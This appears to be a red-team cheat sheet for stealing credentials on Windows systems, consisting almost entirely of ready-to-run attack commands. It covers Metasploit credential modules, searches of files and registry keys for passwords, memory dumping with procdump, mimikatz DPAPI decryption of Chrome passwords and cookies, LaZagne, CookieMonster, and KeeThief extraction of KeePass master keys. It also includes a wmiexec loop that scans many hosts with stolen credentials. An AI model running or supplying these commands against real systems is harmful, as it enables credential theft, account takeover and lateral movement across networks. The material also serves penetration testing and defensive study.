Password mining

MSF

run post/windows/gather/credentials/credential_collector
clipboard_get_data (extapi)
cmdkey /list
dir /s *pass* == *cred* == *vnc* == *.config*
findstr /si <passw> *.xml *.ini *.txt *.vbs *.cmd *.ps1 *.bat *.inf *.eml

Sysprep / GPP

C:\sysprep.inf
C:\sysprep\sysprep.xml
%WINDIR%\Panther\Unattend
%WINDIR%\Panther
%WINDIR%\System32\Sysprep
scanner/smb/smb_enum_gpp
post/windows/gather/credentials/gpp

Process dump

procdump.exe -accepteula -ma <process_name/pid> <out.dmp>
strings <out.dmp>
PowerSploit.ps1: Out-minidump (Get-Process -Id <pid>)
Invoke-mimikittenz.ps1 (putterpanda)

Registry

Get-ItemProperty <registry_key>
reg query <registry_key>
reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
reg query HKCU\software\microsoft\windows\currentversion\explorer\runmru
reg query HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon
reg query HKLM\SYSTEM\Current\ControlSet\Services\SNMP
reg query HKCU\Software\SimonTatham\PuTTY\Sessions
reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password
reg query HKCU\Software\TightVNC\Server
reg query HKLM /f passw /t REG_SZ /s
reg query HKCU /f passw /t REG_SZ /s

AutoLogon

PowerUp.ps1: Get-RegAutoLogon
post/windows/gather/credentials/windows_autologin

Config files

McAfee: PowerUp.ps1: Get-SiteListPassword
Web.config: PowerUp.ps1: Get-WebConfig
Cached SAM: C:\Windows\Repair (Win XP)
findstr.exe /si passw *.txt *.ini *.vbs *.cmd *.ps1 *.bat *.xml *.inf *.eml

Powershell

type C:\Users\<user>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
cat (Get-PSReadlineOption).HistorySavePath
cat (Get-PSReadlineOption).HistorySavePath | sls passw

laZagne

https://github.com/AlessandroZ/LaZagne/releases

laZagne.exe all

Chrome passwords and cookies

In all cases, Chrome must be shutdown when you collect clear text passwords. Must be run with the context of the targeted user.

CookieMonster

https://github.com/rasta-mouse/CookieMonster

CookieMonster creds
CookieMonster.exe cookies [-d <domain>] -e
CookieMonster -a
Mimikatz

If the user’s context cannot be taken see other scenarios: https://www.harmj0y.net/blog/redteaming/operational-guidance-for-offensive-user-dpapi-abuse/

mimikatz dpapi::chrome /in:"C:\Users\<USER>\AppData\Local\Google\Chrome\UserData\Default\Login Data"
mimikatz dpapi::chrome /in:"C:\Users\<USER>\AppData\Local\Google\Chrome\UserData\Default\Login Data" /unprotect
mimikatz dpapi::chrome /in:"C:\Users\<USER>\AppData\Local\Google\Chrome\UserData\Default\Cookies" /unprotect

Keepass

Ressources

https://github.com/HarmJ0y/KeeThief
http://www.harmj0y.net/blog/redteaming/keethief-a-case-study-in-attacking-keepass-part-2/

Detect Keepass

tasklist | findstr /I keepass
Get-Process keepass

List workstations with keepass from a RCE (WMI)

for ip in $(cat <list_ip.txt>); do wmiexec.py <username>:<password>@$ip 'tasklist | findstr /I keepass' | grep -i keepass 1>/dev/null && echo "[+] Found KeePass process on $ip"; done
Attack

Powershell

https://raw.githubusercontent.com/HarmJ0y/KeeThief/master/PowerShell/KeeThief.ps1
Import-Module KeeThief.ps1
Get-KeePassDatabaseKey -Verbose

Executable
Copy both files in the same directory on the target workstation and run the binary file.

If Keepass needs a key file or windows user account or both: use KeePatched.exe